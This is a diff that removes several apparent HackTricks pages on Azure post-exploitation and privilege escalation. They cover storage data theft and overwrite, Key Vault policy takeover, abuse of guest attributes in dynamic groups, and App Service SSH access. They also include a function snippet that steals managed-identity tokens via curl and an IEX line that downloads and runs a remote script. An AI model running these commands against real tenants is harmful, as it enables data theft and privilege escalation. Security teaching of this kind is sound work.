- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Storage Privesc - -For more information about storage check: - -{% content-ref url="../az-services/az-storage.md" %} -[az-storage.md](../az-services/az-storage.md) -{% endcontent-ref %} - -### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read - -A principal with this permission will be able to **list** the blobs (files) inside a container and **download** the files which might contain **sensitive information**. - -```bash -# e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read -az storage blob list \ - --account-name \ - --container-name --auth-mode login - -az storage blob download \ - --account-name \ - --container-name \ - -n file.txt --auth-mode login -``` - -### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write - -A principal with this permission will be able to **write and overwrite files in containers** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some code stored in a blob): - -```bash -# e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write -az storage blob upload \ - --account-name \ - --container-name \ - --file /tmp/up.txt --auth-mode login --overwrite -``` - -### \*/delete - -This would allow to delete objects inside the storage account which might **interrupt some services** or make the client **lose valuable information**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md deleted file mode 100644 index 648443c17..000000000 --- a/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md +++ /dev/null @@ -1,74 +0,0 @@ -# Az - File Share Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## File Share Post Exploitation - -For more information about file shares check: - -{% content-ref url="../az-services/az-file-shares.md" %} -[az-file-shares.md](../az-services/az-file-shares.md) -{% endcontent-ref %} - -### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/read - -A principal with this permission will be able to **list** the files inside a file share and **download** the files which might contain **sensitive information**. - -```bash -# List files inside an azure file share -az storage file list \ - --account-name \ - --share-name \ - --auth-mode login --enable-file-backup-request-intent - -# Download an specific file -az storage file download \ - --account-name \ - --share-name \ - --path \ - --dest /path/to/down \ - --auth-mode login --enable-file-backup-request-intent -``` - -### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/write, Microsoft.Storage/storageAccounts/fileServices/writeFileBackupSemantics/action - -A principal with this permission will be able to **write and overwrite files in file shares** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some code stored in a file share): - -```bash -az storage blob upload \ - --account-name \ - --container-name \ - --file /tmp/up.txt --auth-mode login --overwrite -``` - -### \*/delete - -This would allow to delete file inside the shared filesystem which might **interrupt some services** or make the client **lose valuable information**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md deleted file mode 100644 index 8069be143..000000000 --- a/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md +++ /dev/null @@ -1,47 +0,0 @@ -# Az - Function Apps Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Funciton Apps Post Exploitaiton - -For more information about function apps check: - -{% content-ref url="../az-services/az-function-apps.md" %} -[az-function-apps.md](../az-services/az-function-apps.md) -{% endcontent-ref %} - -{% hint style="danger" %} -**Function Apps post exploitation tricks are very related to the privilege escalation tricks** so you can find all of them there: -{% endhint %} - -{% content-ref url="../az-privilege-escalation/az-functions-app-privesc.md" %} -[az-functions-app-privesc.md](../az-privilege-escalation/az-functions-app-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md deleted file mode 100644 index 0eb9a3592..000000000 --- a/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md +++ /dev/null @@ -1,90 +0,0 @@ -# Az - Table Storage Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Table Storage Post Exploitation - -For more information about table storage check: - -{% content-ref url="../az-services/az-table-storage.md" %} -[az-table-storage.md](../az-services/az-table-storage.md) -{% endcontent-ref %} - -### Microsoft.Storage/storageAccounts/tableServices/tables/entities/read - -A principal with this permission will be able to **list** the tables inside a table storage and **read the info** which might contain **sensitive information**. - -```bash -# List tables -az storage table list --auth-mode login --account-name - -# Read table (top 10) -az storage entity query \ - --account-name \ - --table-name \ - --auth-mode login \ - --top 10 -``` - -### Microsoft.Storage/storageAccounts/tableServices/tables/entities/write | Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action | Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action - -A principal with this permission will be able to **write and overwrite entries in tables** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some trusted data that could abuse some injection vulnerability in the app using it). - -* The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/write` allows all the actions. 
-* The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action` allows to **add** entries -* The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action` allows to **update** existing entries - -```bash -# Add -az storage entity insert \ - --account-name \ - --table-name \ - --auth-mode login \ - --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" - -# Replace -az storage entity replace \ - --account-name \ - --table-name \ - --auth-mode login \ - --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" - -# Update -az storage entity merge \ - --account-name \ - --table-name \ - --auth-mode login \ - --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" -``` - -### \*/delete - -This would allow to delete file inside the shared filesystem which might **interrupt some services** or make the client **lose valuable information**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md deleted file mode 100644 index 92ecc5e14..000000000 --- a/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md +++ /dev/null @@ -1,67 +0,0 @@ -# Az - App Services Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## App Services - -For more information about Azure App services check: - -{% content-ref url="../az-services/az-app-services.md" %} -[az-app-services.md](../az-services/az-app-services.md) -{% endcontent-ref %} - -### Microsoft.Web/sites/publish/Action, Microsoft.Web/sites/basicPublishingCredentialsPolicies/read, Microsoft.Web/sites/config/read, Microsoft.Web/sites/read, - -These permissions allows to call the following commands to get a **SSH shell** inside a web app - -* Direct option: - -```bash -# Direct option -az webapp ssh --name --resource-group -``` - -* Create tunnel and then connect to SSH: - -{% code overflow="wrap" %} -```bash -az webapp create-remote-connection --name --resource-group - -## If successfull you will get a message such as: -#Verifying if app is running.... -#App is running. Trying to establish tunnel connection... -#Opening tunnel on port: 39895 -#SSH is available { username: root, password: Docker! } - -## So from that machine ssh into that port (you might need generate a new ssh session to the jump host) -ssh root@127.0.0.1 -p 39895 -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md deleted file mode 100644 index 9b72dba49..000000000 --- a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md +++ /dev/null @@ -1,78 +0,0 @@ -# Az - Dynamic Groups Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -**Dynamic groups** are groups that has a set of **rules** configured and all the **users or devices** that match the rules are added to the group. Every time a user or device **attribute** is **changed**, dynamic rules are **rechecked**. And when a **new rule** is **created** all devices and users are **checked**. - -Dynamic groups can have **Azure RBAC roles assigned** to them, but it's **not possible** to add **AzureAD roles** to dynamic groups. - -This feature requires Azure AD premium P1 license. - -## Privesc - -Note that by default any user can invite guests in Azure AD, so, If a dynamic group **rule** gives **permissions** to users based on **attributes** that can be **set** in a new **guest**, it's possible to **create a guest** with this attributes and **escalate privileges**. It's also possible for a guest to manage his own profile and change these attributes. - -Get groups that allow Dynamic membership: **`az ad group list --query "[?contains(groupTypes, 'DynamicMembership')]" --output table`** - -### Example - -* **Rule example**: `(user.otherMails -any (_ -contains "security")) -and (user.userType -eq "guest")` -* **Rule description**: Any Guest user with a secondary email with the string 'security' will be added to the group - -For the Guest user email, accept the invitation and check the current settings of **that user** in [https://entra.microsoft.com/#view/Microsoft\_AAD\_IAM/TenantOverview.ReactView](https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView).\ -Unfortunately the page doesn't allow to modify the attribute values so we need to use the API: - -{% code overflow="wrap" %} -```powershell -# Login with the gust user -az login --allow-no-subscriptions - -# Get user object ID -az ad signed-in-user show - -# Update otherMails -az rest --method PATCH \ - --url "https://graph.microsoft.com/v1.0/users/" \ - --headers 'Content-Type=application/json' \ - --body '{"otherMails": 
["newemail@example.com", "anotheremail@example.com"]}' - -# Verify the update -az rest --method GET \ - --url "https://graph.microsoft.com/v1.0/users/" \ - --query "otherMails" -``` -{% endcode %} - -## References - -* [https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/](https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md deleted file mode 100644 index 200b90d6d..000000000 --- a/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md +++ /dev/null @@ -1,60 +0,0 @@ -# Az - Key Vault Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Azure Key Vault - -For more information about this service check: - -{% content-ref url="../az-services/keyvault.md" %} -[keyvault.md](../az-services/keyvault.md) -{% endcontent-ref %} - -### Microsoft.KeyVault/vaults/write - -An attacker with this permission will be able to modify the policy of a key vault (the key vault must be using access policies instead of RBAC). - -```bash -# If access policies in the output, then you can abuse it -az keyvault show --name - -# Get current principal ID -az ad signed-in-user show --query id --output tsv - -# Assign all permissions -az keyvault set-policy \ - --name \ - --object-id \ - --key-permissions all \ - --secret-permissions all \ - --certificate-permissions all \ - --storage-permissions all -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/README.md b/pentesting-cloud/azure-security/az-services/README.md deleted file mode 100644 index d2f2876e2..000000000 --- a/pentesting-cloud/azure-security/az-services/README.md +++ /dev/null @@ -1,99 +0,0 @@ -# Az - Services - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Portals - -You can find the list of **Microsoft portals in** [**https://msportals.io/**](https://msportals.io/) - -### Raw requests - -#### Azure API via Powershell - -Get **access\_token** from **IDENTITY\_HEADER** and **IDENTITY\_ENDPOINT**: `system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');`. - -Then query the Azure REST API to get the **subscription ID** and more . - -```powershell -$Token = 'eyJ0eX..' -$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01' -# $URI = 'https://graph.microsoft.com/v1.0/applications' -$RequestParams = @{ - Method = 'GET' - Uri = $URI - Headers = @{ - 'Authorization' = "Bearer $Token" - } -} -(Invoke-RestMethod @RequestParams).value - -# List resources and check for runCommand privileges -$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01' -$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups//providers/Microsoft.Compute/virtualMachines/ func.HttpResponse: - logging.info('Python HTTP trigger function processed a request.') - IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT'] - IDENTITY_HEADER = os.environ['IDENTITY_HEADER'] - cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER) - val = os.popen(cmd).read() - return func.HttpResponse(val, status_code=200) -``` - -## List of Services - -**The pages of this section are ordered by Azure service. 
In there you will be able to find information about the service (how it works and capabilities) and also how to enumerate each service.** - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-acr.md b/pentesting-cloud/azure-security/az-services/az-acr.md deleted file mode 100644 index e3c5bf95c..000000000 --- a/pentesting-cloud/azure-security/az-services/az-acr.md +++ /dev/null @@ -1,76 +0,0 @@ -# Az - ACR - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Azure Container Registry (ACR) is a managed service provided by Microsoft Azure for **storing and managing Docker container images and other artifacts**. It offers features such as integrated developer tools, geo-replication, security measures like role-based access control and image scanning, automated builds, webhooks and triggers, and network isolation. It works with popular tools like Docker CLI and Kubernetes, and integrates well with other Azure services. - -### Enumerate - -To enumerate the service you could use the script [**Get-AzACR.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/Misc/Get-AzACR.ps1): - -{% code overflow="wrap" %} -```bash -# List Docker images inside the registry -IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/NetSPI/MicroBurst/master/Misc/Get-AzACR.ps1") - -Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Internet Explorer\Main" -Name "DisableFirstRunCustomize" -Value 2 - -Get-AzACR -username -password -registry .azurecr.io -``` -{% endcode %} - -{% tabs %} -{% tab title="az cli" %} -```bash -az acr list --output table -az acr show --name MyRegistry --resource-group MyResourceGroup -``` -{% endtab %} - -{% tab title="Az Powershell" %} -```powershell -# List all ACRs in your subscription -Get-AzContainerRegistry - -# Get a specific ACR -Get-AzContainerRegistry -ResourceGroupName "MyResourceGroup" -Name "MyRegistry" -``` -{% endtab %} -{% endtabs %} - -Login & Pull from the registry - -```bash -docker login .azurecr.io --username --password -docker pull .azurecr.io/: -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-application-proxy.md b/pentesting-cloud/azure-security/az-services/az-application-proxy.md deleted file mode 100644 index 8b5f6c1c0..000000000 --- a/pentesting-cloud/azure-security/az-services/az-application-proxy.md +++ /dev/null @@ -1,66 +0,0 @@ -# Az - Application Proxy - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -[From the docs:](https://learn.microsoft.com/en-us/entra/identity/app-proxy/application-proxy) - -Azure Active Directory's Application Proxy provides **secure remote access to on-premises web applications**. After a **single sign-on to Azure AD**, users can access both **cloud** and **on-premises applications** through an **external URL** or an internal application portal. - -It works like this: - -
- -1. After the user has accessed the application through an endpoint, the user is directed to the **Azure AD sign-in page**. -2. After a **successful sign-in**, Azure AD sends a **token** to the user's client device. -3. The client sends the token to the **Application Proxy service**, which retrieves the user principal name (UPN) and security principal name (SPN) from the token. **Application Proxy then sends the request to the Application Proxy connector**. -4. If you have configured single sign-on, the connector performs any **additional authentication** required on behalf of the user. -5. The connector sends the request to the **on-premises application**. -6. The **response** is sent through the connector and Application Proxy service **to the user**. - -## Enumeration - -```powershell -# Enumerate applications with application proxy configured -Get-AzureADApplication | %{try{Get-AzureADApplicationProxyApplication -ObjectId $_.ObjectID;$_.DisplayName;$_.ObjectID}catch{}} - -# Get applications service principal -Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -eq "Name"} - -# Use the following ps1 script from https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/scripts/powershell-display-users-group-of-app -# to find users and groups assigned to the application. Pass the ObjectID of the Service Principal to it -Get-ApplicationProxyAssignedUsersAndGroups -ObjectId -``` - -## References - -* [https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/application-proxy](https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/application-proxy) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
